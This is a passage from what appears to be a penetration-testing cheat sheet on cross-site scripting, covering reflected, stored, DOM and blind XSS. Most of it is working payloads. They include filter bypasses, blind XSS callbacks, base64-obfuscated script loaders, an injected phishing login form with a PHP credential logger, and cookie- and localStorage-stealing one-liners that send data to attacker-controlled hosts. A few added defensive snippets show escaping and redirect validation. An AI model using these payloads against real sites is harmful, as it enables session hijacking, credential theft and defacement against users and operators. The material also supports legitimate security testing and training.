"><svg><animate onbegin=event/>⁄<set attributeName=onerror/to=alert`1`
<svg onload="a=domain,b=confirm,c=window,c.onerror=b;throw a">
<svg id=javascript:alert(1) onload=location=id>
<0 name="<svg/onload=alert()>">
<cool/onpointermove=(confirm)(1)>MoveMouseHere
Payload;"style="width:100%;height:10000px;background:red" onmouseover="alert(origin)
<a href="javascript:alert/**/('1')">click</a>
<script>alert/**/('2')</script>
<svg><script>ale<!-- -->rt('3')</script></svg>
<svg><script>ale<//looks like js comment>rt('3')</script></svg>
<img/src/onerror="alert/* */('4')">
```

## Tiny XSS

```javascript
<base/href=//Ǌ.₨>
<svg/onload=eval(name)>
<style/onload=eval(name)>
<svg/onload=eval(`'`+URL)>
<svg/onload=location=name>
<style/onerror=eval(name)>
<script/src=//Ǌ.₨></script>
<svg/onload=import(/\Ǌ.₨/)>
<iframe/onload=src=top.name>
<svg><svg/onload=eval(name)>
<style/onload=eval(`'`+URL)>
<iframe/onload=eval(`'`+URL)>
<style/onload=import(/\Ǌ.₨/)>
<audio/src/onerror=eval(name)>
<iframe/onload=import(/\Ǌ.₨/)>
<img/src/onerror=eval(`'`+URL)>
<iframe/onload=src=top[0].name+/\Ǌ.₨/>
<iframe/srcdoc="<svg><script/href=//Ǌ.₨ />">
<iframe/onload=src=contentWindow.name+/\Ǌ.₨/>
<iframe/srcdoc="<script/src=//Ǌ.₨></script>">
```

{% embed url="<https://tinyxss.terjanq.me/>" %}

## Stored XSS

```html
<script>alert(window.origin)</script>
```

{% hint style="success" %}
***Tip:** Many modern web applications utilize cross-domain IFrames to handle user input, so that even if the web form is vulnerable to XSS, it would not be a vulnerability on the main web application. This is why we are showing the value of `window.origin` in the alert box, instead of a static value like `1`. In this case, the alert box would reveal the URL it is being executed on, and will confirm which form is the vulnerable one, in case an IFrame was being used.*
{% endhint %}

```
<script>print()</script>
```

Pops up the browser's print dialog, which is unlikely to be blocked by any browser.

### Cookies

```
<script>alert(document.cookie)</script>
```

## Reflected XSS

```html
<div></div><ul class="list-unstyled" id="todo"><div style="padding-left:25px">Task '<script>alert(window.origin)</script>' could not be added.</div></ul>
```

The single quotes wrap our XSS payload `'<script>alert(window.origin)</script>'`.

A `GET` request sends its parameters and data as part of the URL, so to target a user we can send them a URL that carries our payload:

```
http://URL/index.php?task=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E
```
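The reflection above, as an added example that is not code from the original page: a Node fragment that builds the "could not be added" message by concatenating the `task` parameter into markup, beside an output-escaped version. The hostname `app.example`, the helper names and the `reflectsVerbatim` check are assumptions for this example.

```javascript
// Added example, not from the original page: reflected XSS via string
// concatenation of a query parameter, and the output-escaping fix.

// Escape the five characters that matter in HTML text and quoted attributes.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Extract the parameter the way a handler would. The base is only there
// because request URLs are usually path-relative.
function taskFromRequestUrl(requestUrl) {
  const params = new URL(requestUrl, "http://localhost").searchParams;
  return params.get("task") ?? "";
}

// Vulnerable: the raw parameter is interpolated straight into the response.
function renderErrorUnsafe(task) {
  return `<div style="padding-left:25px">Task '${task}' could not be added.</div>`;
}

// Fixed: escape at the point of output, for the HTML text context it lands in.
function renderErrorSafe(task) {
  return `<div style="padding-left:25px">Task '${escapeHtml(task)}' could not be added.</div>`;
}

// Hypothetical detector in the spirit of the one-liner earlier on the page:
// does the rendered body still contain the payload verbatim?
function reflectsVerbatim(body, payload) {
  return body.includes(payload);
}

// Constructed request URL (the page's payload, hostname replaced).
const SAMPLE_REQUEST =
  "http://app.example/index.php?task=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E";

const sampleTask = taskFromRequestUrl(SAMPLE_REQUEST);
console.log("unsafe:", renderErrorUnsafe(sampleTask));
console.log("safe:  ", renderErrorSafe(sampleTask));
```

Escaping has to match the context the value lands in; this helper is only correct for HTML text and quoted attribute values, not for JavaScript strings, URLs or CSS.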

## DOM XSS

Sink:

* `document.write()`
* `DOM.innerHTML`
* `DOM.outerHTML`

### Document Sink

```
someDOMElement.innerHTML
someDOMElement.outerHTML
someDOMElement.insertAdjacentHTML
document.write()
document.writeln()
```

### Location Sink

```
document.location
window.location.assign()
window.location.replace()
```

### Execution Sink

```
eval()
setTimeout()
setInterval()
Function()
```

### DOM Source

A source is a JavaScript property that accepts data which is potentially attacker-controlled:

```
document.URL
document.documentURI
document.URLUnencoded
document.baseURI
location
location.search
document.cookie
document.referrer
window.name
history.pushState
history.replaceState
localStorage
sessionStorage
```

jQuery:

* `add()`
* `after()`
* `append()`

```javascript
var pos = document.URL.indexOf("task=");
var task = document.URL.substring(pos + 5, document.URL.length);
```

```javascript
document.getElementById("todo").innerHTML = "<b>Next Task:</b> " + decodeURIComponent(task);
```

Markup assigned through `innerHTML` does not execute `<script>` tags, as a security feature, so the payload has to use an event handler attribute instead.

Payload:

```html
<img src="" onerror=alert(window.origin)>
```
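The source-to-sink flow above, as an added example that is not code from the original page: the page's naive `document.URL` extraction next to a parser-based one, and the `innerHTML` sink next to a `textContent` sink. Node has no DOM, so the "element" is a plain object that records whichever property is assigned; the URL is constructed and the function names are assumptions.

```javascript
// Added example, not from the original page: DOM XSS source and sink handling.

// Source handling as in the page's snippet: everything after "task=" is taken
// verbatim, so trailing parameters and the fragment ride along with it.
function extractTaskNaive(url) {
  const pos = url.indexOf("task=");
  if (pos === -1) return "";
  return decodeURIComponent(url.substring(pos + 5));
}

// Source handling with the URL parser: exactly one parameter, already decoded.
function extractTaskSafe(url) {
  return new URL(url).searchParams.get("task") ?? "";
}

// Vulnerable sink (the page's innerHTML assignment). innerHTML does not run
// <script> tags, but it does create elements whose event handler attributes
// fire, which is why <img onerror> works where <script> does not.
function renderTaskUnsafe(el, task) {
  el.innerHTML = "<b>Next Task:</b> " + task;
  return el.innerHTML;
}

// Hardened sink: textContent stores the string as data, never as markup.
// The bold label is dropped here; build it with createElement in a browser.
function renderTaskSafe(el, task) {
  el.textContent = "Next Task: " + task;
  return el.textContent;
}

// Constructed URL carrying the page's payload plus an extra parameter and fragment.
const SAMPLE_URL =
  "http://app.example/index.php?task=%3Cimg%20src%3D%22%22%20onerror%3Dalert(window.origin)%3E&page=2#top";

console.log("naive source :", extractTaskNaive(SAMPLE_URL));
console.log("parsed source:", extractTaskSafe(SAMPLE_URL));
console.log("unsafe sink  :", renderTaskUnsafe({}, extractTaskSafe(SAMPLE_URL)));
console.log("safe sink    :", renderTaskSafe({}, extractTaskSafe(SAMPLE_URL)));
```

In a real page, a tool such as DOM Invader (linked below) watches exactly these property assignments; the plain object here makes the same distinction visible without a browser.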

```
# Open Redirect
Ex: https://example.com/redirect?url=jav%20ascri%20pt:alert(1)
# Simple bypasses
javascript:alert(1)
JavaScript:alert(1)
JAVASCRIPT:alert(1)

# Bypass weak regex patterns (try repositioning the URL-encoded special characters)
ja%20vascri%20pt:alert(1)
jav%0Aascri%0Apt:alert(1)
jav%0Dascri%0Dpt:alert(1)
jav%09ascri%09pt:alert(1)

# More advanced weak regex pattern bypasses
%19javascript:alert(1)
javascript://%0Aalert(1)
javascript://%0Dalert(1)
javascript://https://example.com%0Aalert(1)
```
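Why the weak pattern checks above fail and what a parser-based check does instead, as an added example that is not code from the original page. Inputs are the decoded parameter values a framework would hand the handler (the page lists them URL-encoded); the allowed origin `https://example.com` and the function names are assumptions.

```javascript
// Added example, not from the original page: redirect target validation.

// Constructed allowlist of origins this application may redirect to.
const ALLOWED_ORIGINS = new Set(["https://example.com"]);

// Weak check of the kind the bypasses above defeat: a blocklist regex on the
// raw string. A tab or newline inside the scheme, or a leading control
// character, is not matched here but is stripped by the browser's URL parser.
function naiveAllowsRedirect(target) {
  return !/^javascript:/i.test(target);
}

// Parser-based check: resolve the value the way the browser will, then
// allowlist both the scheme and the origin. The WHATWG parser (Node's URL)
// removes ASCII tab/newline and leading C0 controls before parsing, so the
// protocol it reports is the one the navigation would actually use.
function parserAllowsRedirect(target, base = "https://example.com/") {
  let url;
  try {
    url = new URL(target, base);
  } catch {
    return false; // unparsable input is rejected, not guessed at
  }
  if (url.protocol !== "https:" && url.protocol !== "http:") return false;
  return ALLOWED_ORIGINS.has(url.origin);
}

// Constructed decoded inputs corresponding to the encoded forms listed above.
const SAMPLES = [
  "https://example.com/account",
  "/dashboard",
  "//attacker.example/",
  "JavaScript:alert(1)",
  "jav\tascri\npt:alert(1)",
  "\x19javascript:alert(1)",
  "javascript://https://example.com\nalert(1)",
];

for (const s of SAMPLES) {
  console.log(JSON.stringify(s), "naive:", naiveAllowsRedirect(s), "parser:", parserAllowsRedirect(s));
}
```

The design point is that the check and the browser must agree on how the string is interpreted; a regex over the raw bytes never sees the normalisation the browser applies, so matching the scheme after parsing, against an allowlist, is the only check that holds.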

```
https://example.com/index.php/x' oncontentvisibilityautostatechange=alert(1) style='display:block;content-visibility:auto
```

### Bypass DOMPurify - [Mutated XSS](#mxss-mutated-xss)

### Dom-Explorer

{% embed url="<https://yeswehack.github.io/Dom-Explorer/#eyJpbnB1dCI6IiIsInBpcGVsaW5lcyI6W3siaWQiOiJpOGxpMDF3MCIsIm5hbWUiOiJEb20gVHJlZSIsInBpcGVzIjpbeyJuYW1lIjoiRG9tUGFyc2VyIiwiaWQiOiIxN3hmb3V2MSIsImhpZGUiOmZhbHNlLCJza2lwIjpmYWxzZSwib3B0cyI6eyJ0eXBlIjoidGV4dC9odG1sIiwic2VsZWN0b3IiOiJib2R5Iiwib3V0cHV0IjoiaW5uZXJIVE1MIiwiYWRkRG9jdHlwZSI6dHJ1ZX19XX1dfQ==>" %}

### Burp

{% embed url="<https://portswigger.net/burp/documentation/desktop/tools/dom-invader>" %}

### Firefox Extension

{% embed url="<https://github.com/swoops/eval_villain>" %}

DOMLogger++ - see [Burp extensions](https://0xss0rz.gitbook.io/0xss0rz/pentest/tools/burp)

{% embed url="<https://mizu.re/post/exploring-the-dompurify-library-hunting-for-misconfigurations>" %}

### Chrome extension

{% embed url="<https://github.com/filedescriptor/untrusted-types>" %}

## Blind XSS

{% embed url="<https://canarytokens.org/nest/?s=03>" %}

Blind XSS Scanner

{% embed url="<https://github.com/ethicalhackingplayground/bxss>" %}

### ezXSS

{% embed url="<https://github.com/ssl/ezXSS>" %}

### BeeXSS

{% embed url="<https://github.com/AnonKryptiQuz/BeeXSS>" %}

### XSSHunter

{% embed url="<https://github.com/trufflesecurity/xsshunter>" %}

{% embed url="<https://blog.intigriti.com/hacking-tools/hacker-tools-xsshunter>" %}

### BXSS Hunter

{% embed url="<https://bxsshunter.com/>" %}

### KNOXSS

Create a demo account: <https://knoxss.me/>

**Blind XSS Custom Vector - Default**

```
<Script /Src=https://X55.is?1=[YOUR_ID]></Script>
```

**Blind XSS Custom Vector - Short Polyglot (HTML & JS Main Cases)**

```
'/*\'/*"/*\"/*</Script><Input/AutoFocus/OnFocus=/**/(import(/https:\\X55.is?1=[YOUR_ID]/.source))//>
```

**Blind XSS Custom Vector - Full Polyglot (20+ XSS Cases)**

```
JavaScript://%250A/*?'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(import(/https:\\X55.is?1=[YOUR_ID]/.source))}//\76-->
```

## XSS Discovery

### Burp, Nessus, ZAP

### [Tools](#tools-1)

### Nuclei Template

<https://raw.githubusercontent.com/coffinxp/priv8-Nuclei/refs/heads/main/reflection.yaml>

```yaml
id: reflection
info:
    name: search for reflection in header and body
    author: roninja
    severity: low
    description: Potential Cross-Site Scripting (XSS), Cross-Site Request Forgery (CSRF) attacks, Cache Poisoning and Open URL Redirection.
    reference:
      - https://{{Hostname}}.{{interactsh-url}}
    tags: reflection,header,cookies
    metadata:
      max-request: 2
requests:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Mobile Safari/537.36
        Referer: https://r.{{Host}}.{{interactsh-url}}
        Origin: https://o.{{Host}}.{{interactsh-url}}
        Location: https://l.{{Host}}.{{interactsh-url}}
        X-Forwarded-Host: xfh.{{Host}}.{{interactsh-url}}
        X-Forwarded-For: xff.{{Host}}.{{interactsh-url}}
        X-Host: xh.{{Host}}.{{interactsh-url}}
        X-Original-Host: xoh.{{Host}}.{{interactsh-url}}
        X-Original-URL: xou.{{Host}}.{{interactsh-url}}
        Cookie: gude=tama.{{interactsh-url}}
        Gudetama: {{interactsh-url}}
        Accept-Encoding: gzip, deflate, br, zstd

      - |
        GET / HTTP/1.1
        Host: {{Host}}.{{interactsh-url}}
        User-Agent: Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Mobile Safari/537.36
        Cookie: gude=tama.{{interactsh-url}}
        Set-Cookie: gude=tama.{{interactsh-url}}
        Accept-Encoding: gzip, deflate, br, zstd

      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Linux; Android 10; K) AppleWebkit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Mobile Safari/537.36
        Cookie: gude=tama.{{interactsh-url}}
        Set-Cookie: gude=tama.{{interactsh-url}}
        Accept-Encoding: gzip, deflate, br, zstd
    
    redirects: false
    stop-at-first-match: false
    matchers-condition: or
    matchers:
      - type: regex
        regex:
          - '(?m)^(?:(?:Set-Cookie\s*?:(?:\s*?|.*?;\s*?))(gude=tama)(?:\s*?)(?:$|;))'
          - '(?mi)^(.*:\s*.*oast.*)'
        part: header

      - type: regex
        regex:
          - '(?m)^(?:(?:Set-Cookie\s*?:(?:\s*?|.*?;\s*?))(gude=tama)(?:\s*?)(?:$|;))'
          - '(?mi)^(.*:\s*.*oast.*)'
        part: body

```

### Open Source

{% embed url="<https://github.com/s0md3v/XSStrike>" %}

```shell-session
python xsstrike.py -u "http://SERVER_IP:PORT/index.php?task=test" 
```

{% embed url="<https://github.com/rajeshmajumdar/BruteXSS>" %}

{% embed url="<https://github.com/epsylon/xsser>" %}

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2FRatVgMSaoFGhe39IFk1I%2Fimage.png?alt=media&#x26;token=c3441318-fcd7-488b-9379-02b5c1f1f174" alt=""><figcaption></figcaption></figure>

Another great tool:

{% embed url="<https://github.com/hahwul/dalfox>" %}

Prebuilt binaries are on the release page; just download one.

### Commercial Tool

* <https://knoxss.me/> + the KNOXSS Firefox extension
* <https://store.xss0r.com/>
* See [Blind XSS](#blind-xss)

### Manual

See [Payload](#payload)

{% hint style="info" %}
Note: XSS can be injected into any input in the HTML page, which is not exclusive to HTML input fields, but may also be in HTTP headers like the Cookie or User-Agent (i.e., when their values are displayed on the page).
{% endhint %}

## Defacing

The DOM properties usually used to change the main look of a web page:

* Background Color `document.body.style.background`
* Background `document.body.background`
* Page Title `document.title`
* Page Text `DOM.innerHTML`

### Changing Background

```html
<script>document.body.style.background = "#141d2b"</script>
```

{% hint style="info" %}
Here we set the background color to the default Hack The Box background color. We can use any other hex value, or can use a named color like `= "black"`.
{% endhint %}

```
# Change background color to red
<img src="test" onmouseover="document.body.style.backgroundColor = 'red'">
```

```html
<script>document.body.background = "https://www.hackthebox.eu/images/logo-htb.svg"</script>
```

### Changing Page Title

```html
<script>document.title = 'HackTheBox Academy'</script>
```

```
# Title defacement
<script>document.getElementById('thm-title').innerHTML="I am a hacker";</script>
```

### Changing Page Text

```javascript
document.getElementById("todo").innerHTML = "New Text"
```

jQuery

```javascript
$("#todo").html('New Text');
```

innerHTML

```javascript
document.getElementsByTagName('body')[0].innerHTML = "New Text"
```

`document.getElementsByTagName('body')` returns all `body` elements; by specifying `[0]` we select the first one, so writing to its `innerHTML` replaces the entire text of the web page.

```html
<script>document.getElementsByTagName('body')[0].innerHTML = '<center><h1 style="color: white">Cyber Security Training</h1><p style="color: white">by <img src="https://academy.hackthebox.com/images/logo-htb.svg" height="25px" alt="HTB Academy"> </p></center>'</script>
```

## Phishing

{% hint style="info" %}
Tip: To understand which payload should work, try to view how your input is displayed in the HTML source after you add it.
{% endhint %}

### Login Form Injection

Login form:

```html
<h3>Please login to continue</h3>
<form action=http://OUR_IP>
    <input type="username" name="username" placeholder="Username">
    <input type="password" name="password" placeholder="Password">
    <input type="submit" name="submit" value="Login">
</form>
```

Payload:

```javascript
document.write('<h3>Please login to continue</h3><form action=http://OUR_IP><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');
```

Victim URL: `http://SERVER_IP/phishing/index.php?url=...SNIP...`

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2FK7ybMnddmjNF3opoVdsx%2Fimage.png?alt=media&#x26;token=9db31b6b-1201-4e5c-9b24-3b61d85620f3" alt=""><figcaption></figcaption></figure>

Remove the URL field, so that the victim may think they have to log in to be able to use the page. To do so, use `document.getElementById().remove()`.

Find the `id` of the HTML element we want to remove:

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2FUUwjXa9tTI2KpTqoesGt%2Fimage.png?alt=media&#x26;token=22b892fc-cd65-493f-9555-5ad91008efcf" alt=""><figcaption></figcaption></figure>

```javascript
document.getElementById('urlform').remove();
```

Final Payload:

```javascript
document.write('<h3>Please login to continue</h3><form action=http://OUR_IP><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');document.getElementById('urlform').remove();
```

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2F3orG3sKUkmt0viQyOywo%2Fimage.png?alt=media&#x26;token=79d0e912-0e0a-49c0-b381-d12bf94fe4ec" alt=""><figcaption></figcaption></figure>

Comment out the original HTML left after the injected login form by appending an opening HTML comment to the payload:

```html
...PAYLOAD... <!-- 
```

### Credential Stealing

If any victim attempts to log in with the form, we will get their credentials.

```shell-session
 sudo nc -lvnp 80
```

```shell-session
connect to [10.10.XX.XX] from (UNKNOWN) [10.10.XX.XX] XXXXX
GET /?username=test&password=test&submit=Login HTTP/1.1
Host: 10.10.XX.XX
...SNIP...
```

Use a basic PHP script that logs the credentials from the HTTP request and then returns the victim to the original page without any injections.

index.php:

```php
<?php
if (isset($_GET['username']) && isset($_GET['password'])) {
    $file = fopen("creds.txt", "a+");
    fputs($file, "Username: {$_GET['username']} | Password: {$_GET['password']}\n");
    header("Location: http://SERVER_IP/phishing/index.php");
    fclose($file);
    exit();
}
?>
```

Start a PHP listening server:

```shell-session
$ mkdir /tmp/tmpserver
$ cd /tmp/tmpserver
$ vi index.php #at this step we wrote our index.php file
$ sudo php -S 0.0.0.0:80
PHP 7.4.15 Development Server (http://0.0.0.0:80) started
```

### Blind XSS Detection

{% embed url="<https://www.intigriti.com/researchers/blog/hacking-tools/hunting-for-blind-cross-site-scripting-xss-vulnerabilities-a-complete-guide>" %}

{% embed url="<https://canarytokens.org/nest/?s=03>" %}

Payload Generator:

{% embed url="<https://github.com/jadu101/blind_xss_payload_generator/tree/main?s=03>" %}

```html
<script src="http://OUR_IP/script.js"></script>
```

To identify which input field executed the script, use a distinct path per field:

```html
<script src="http://OUR_IP/username"></script>
```

If we get a request for `/username`, then we know that the `username` field is vulnerable to XSS, and so on.

{% hint style="success" %}
*Also check* [*Polyglot XSS payload*](https://medium.com/@0xAwali/let-me-bxss-em-all-72832064dd83)
{% endhint %}

```javascript
<img src="http://example.burpcollaborator.net/image">
<img src="http://example.burpcollaborator.net/image-only" onerror='this.src="http://example.burpcollaborator.net/image-xss?"+btoa(document.location)'>
<img src=x onerror='this.src="http://example.burpcollaborator.net/image-xss?"+btoa(document.location)'>
<img src=x onerror='this.src="http://"+btoa(document.location)+".example.burpcollaborator.net/image-dns?"'>
<img src=x onerror='this.src="http://example.burpcollaborator.net/image-xss?"+btoa(document.location)'>
<img src=x onerror='fetch("http://example.burpcollaborator.net/image-xss-post",{method:"POST",body:btoa(document.body.innerHTML),mode:"no-cors"})'>
<iframe src='javascript:window.location="http://example.burpcollaborator.net/iframe-src?"+btoa(parent.document.location)'></iframe>
<iframe srcdoc='<script>window.location="http://example.burpcollaborator.net/iframe-srcdoc?"+btoa(parent.document.location)</script>'></iframe>
<iframe srcdoc='<script>fetch("http://example.burpcollaborator.net/iframe-srcdoc-post",{method:"POST",body:btoa(parent.document.body.innerHTML),mode:"no-cors"})</script>'></iframe>
<object data='javascript:window.location="http://example.burpcollaborator.net/iframe-src?"+btoa(parent.document.location)'></object>
<input onfocus='fetch("http://example.burpcollaborator.net/imput-post",{method:"POST",body:btoa(document.body.innerHTML),mode:"no-cors"})' autofocus>
<script src=http://example.burpcollaborator.net/script-tag></script>
<script type="text/javascript" src="http://example.burpcollaborator.net/script-tag-type"></script>
<script type="module" src="http://example.burpcollaborator.net/script-tag-module"></script>
<script nomodule src="http://example.burpcollaborator.net/script-tag-nomodule"></script>
'"><img src="http://example.burpcollaborator.net/image">
'"><img src="http://example.burpcollaborator.net/image-only" onerror='this.src="http://example.burpcollaborator.net/image-xss?"+btoa(document.location)'>
'"><img src=x onerror='this.src="http://example.burpcollaborator.net/image-xss?"+btoa(document.location)'>
'"><img src=x onerror='this.src="http://"+btoa(document.location)+".example.burpcollaborator.net/image-dns?"'>
'"><img src=x onerror='this.src="http://example.burpcollaborator.net/image-xss?"+btoa(document.location)'>
'"><img src=x onerror='fetch("http://example.burpcollaborator.net/image-xss-post",{method:"POST",body:btoa(document.body.innerHTML),mode:"no-cors"})'>
'"><iframe src='javascript:window.location="http://example.burpcollaborator.net/iframe-src?"+btoa(parent.document.location)'></iframe>
'"><iframe srcdoc='<script>window.location="http://example.burpcollaborator.net/iframe-srcdoc?"+btoa(parent.document.location)</script>'></iframe>
'"><iframe srcdoc='<script>fetch("http://example.burpcollaborator.net/iframe-srcdoc-post",{method:"POST",body:btoa(parent.document.body.innerHTML),mode:"no-cors"})</script>'></iframe>
'"><object data='javascript:window.location="http://example.burpcollaborator.net/iframe-src?"+btoa(parent.document.location)'></object>
<input onfocus='fetch("http://example.burpcollaborator.net/imput-post",{method:"POST",body:btoa(document.body.innerHTML),mode:"no-cors"})' autofocus>
'"><script src=http://example.burpcollaborator.net/script-tag></script>
'"><script type="text/javascript" src="http://example.burpcollaborator.net/script-tag-type"></script>
'"><script type="module" src="http://example.burpcollaborator.net/script-tag-module"></script>
'"><script nomodule src="http://example.burpcollaborator.net/script-tag-nomodule"></script>
javascript:window.location="http://example.burpcollaborator.net/js-scheme?"+btoa(document.location)
';"</scrpt><scrpt/src=//example.burpcollaborator.net/c/target-1></scrpt>
'//><scrIpt src=//example.burpcollaborator.net/c/kee-kee></scrIpt>
1"`/import(src)'<Script/Src=//example.burpcollaborator.net?1=[ID]><Img/OnLoad='`
--></tiTle></stYle></texTarea></scrIpt>"//'//><scrIpt src="http://example.burpcollaborator.net/"></scrIpt>
```

{% embed url="<https://www.intigriti.com/researchers/blog/hacking-tools/hunting-for-blind-cross-site-scripting-xss-vulnerabilities-a-complete-guide>" %}

```html
<!-- Include your IP in the base64 (it decodes to a loader for {SERVER}/script.js) -->

<!-- Image tag -->
'"><img src="x" onerror="eval(atob(this.id))" id="Y29uc3QgeD1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTt4LnNyYz0ne1NFUlZFUn0vc2NyaXB0LmpzJztkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKHgpOw==">

<!-- Input tag with autofocus -->
'"><input autofocus onfocus="eval(atob(this.id))" id="Y29uc3QgeD1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTt4LnNyYz0ne1NFUlZFUn0vc2NyaXB0LmpzJztkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKHgpOw==">

<!-- In case jQuery is loaded, we can make use of the getScript method -->
'"><script>$.getScript("{SERVER}/script.js")</script>

<!-- Make use of the JavaScript protocol (applicable in cases where your input lands into the "href" attribute or a specific DOM sink) -->
javascript:eval(atob("Y29uc3QgeD1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTt4LnNyYz0ne1NFUlZFUn0vc2NyaXB0LmpzJztkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKHgpOw=="))

<!-- Render an iframe to validate your injection point and receive a callback -->
'"><iframe src="{SERVER}"></iframe>

<!-- Bypass certain Content Security Policy (CSP) restrictions with a base tag -->
<base href="{SERVER}" />

<!-- Make use of the meta-tag to initiate a redirect -->
<meta http-equiv="refresh" content="0; url={SERVER}" />

<!-- In case your target makes use of AngularJS -->
{{constructor.constructor("import('{SERVER}/script.js')")()}}
```

Payloads from PayloadsAllTheThings

```
"><script src=//OUR_IP/field_name></script>
```

```html
<script src=http://OUR_IP></script>
'><script src=http://OUR_IP></script>
"><script src=http://OUR_IP></script>
javascript:eval('var a=document.createElement(\'script\');a.src=\'http://OUR_IP\';document.body.appendChild(a)')
<script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);a.open("GET", "//OUR_IP");a.send();</script>
<script>$.getScript("http://OUR_IP")</script>
'"></title></textarea></script></style></noscript><script src=http://OUR_IP></script>
```

```shell-session
0xss0rz@htb[/htb]$ mkdir /tmp/tmpserver
0xss0rz@htb[/htb]$ cd /tmp/tmpserver
0xss0rz@htb[/htb]$ sudo php -S 0.0.0.0:80
PHP 7.4.15 Development Server (http://0.0.0.0:80) started
```

Now we can test these payloads one by one, using the same payload for all input fields but appending the name of each field after our IP:

```html
<script src=http://OUR_IP/fullname></script> <!-- this goes inside the full-name field -->
<script src=http://OUR_IP/username></script> <!-- this goes inside the username field -->
...SNIP...
```

{% hint style="success" %}
*Tip: We will notice that the email must match an email format, even if we try manipulating the HTTP request parameters, as it seems to be validated on both the front-end and the back-end. Hence, the email field is not vulnerable, and we can skip testing it. Likewise, we may skip the password field, as passwords are usually hashed and not usually shown in cleartext. This helps us in reducing the number of potentially vulnerable input fields we need to test.*
{% endhint %}

Also see [Blind XSS](#blind-xss)

### Blind XSS in Request Header

{% content-ref url="http-header-exploitation" %}
[http-header-exploitation](https://0xss0rz.gitbook.io/0xss0rz/pentest/web-attacks/http-header-exploitation)
{% endcontent-ref %}

Try it in common headers:

* Referer
* X-Forwarded-For, X-Forwarded-Host, X-Forwarded-Ip, Host (in case of a reverse proxy)
* User-Agent
* Etc.

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2FJChlBXlOV7IXiOb00vXQ%2Fimage.png?alt=media&#x26;token=ed519578-7aa3-4bef-9a41-fca245807f41" alt=""><figcaption></figcaption></figure>

## Session Hijacking

Payloads

{% embed url="<https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20Injection#exploit-code-or-poc>" %}

```javascript
document.location='http://OUR_IP/index.php?c='+document.cookie;
new Image().src='http://OUR_IP/index.php?c='+document.cookie;
```

```
<script>document.location='http://OUR_IP/index.php?c='+document.cookie;</script>
<script>new Image().src='http://OUR_IP/index.php?c='+document.cookie</script>
```

Write any of these JavaScript payloads to `script.js`, which will be hosted on our VM:

```javascript
new Image().src='http://OUR_IP/index.php?c='+document.cookie
```

Change the URL in the XSS payload we found earlier to use `script.js`:

```html
<script src=http://OUR_IP/script.js></script>
```

If there are many cookies, we may not know which value belongs to which cookie. So, we can write a PHP script that splits them onto separate lines and writes them to a file.

Save the following PHP script as `index.php`

```php
<?php
if (isset($_GET['c'])) {
    $list = explode(";", $_GET['c']);
    foreach ($list as $key => $value) {
        $cookie = urldecode($value);
        $file = fopen("cookies.txt", "a+");
        fputs($file, "Victim IP: {$_SERVER['REMOTE_ADDR']} | Cookie: {$cookie}\n");
        fclose($file);
    }
}
?>
```

{% embed url="<https://portswigger.net/web-security/cross-site-scripting/exploiting/lab-stealing-cookies>" %}

{% embed url="<https://infinitelogins.com/2020/10/13/using-cross-site-scripting-xss-to-steal-cookies/>" %}

```
# Cookie stealing example
<img src=x onerror="this.src='http://192.168.0.18:8888/?'+document.cookie; this.removeAttribute('onerror');">
```

```
<img src='https://<attacker-server>/yikes?jwt='+JSON.stringify(localStorage);'--!>
```

```
<img src=x encodeURIComponent(document.cookie) onerror="fetch('https://[BURP-COLLAB-ID]/' + encodeURIComponent(document.cookie))">
```

```
%3Cimg%20src%3Dx+encodeURIComponent(document.cookie)%20onerror%3D%22fetch(%27https://[BURP-COLLAB-ID]/%27%2bencodeURIComponent(document.cookie))%22%3E
```

### Redirect

```
https://accounts.reddit.com/?dest=javascript:fetch('//attacker.com?c='+btoa(document.cookie))
```

{% content-ref url="open-redirection" %}
[open-redirection](https://0xss0rz.gitbook.io/0xss0rz/pentest/web-attacks/open-redirection)
{% endcontent-ref %}

### Bypass HTTPOnly - Sandwich Technique

{% embed url="<https://portswigger.net/research/stealing-httponly-cookies-with-the-cookie-sandwich-technique>" %}

### Extract existing page code

```javascript
<img src=x onerror="fetch('/api/info').then(r=>r.text()).then(t=>fetch('http://10.10.16.3/log?data='+encodeURIComponent(t),{mode:'no-cors'}))">
```

```javascript
<script>
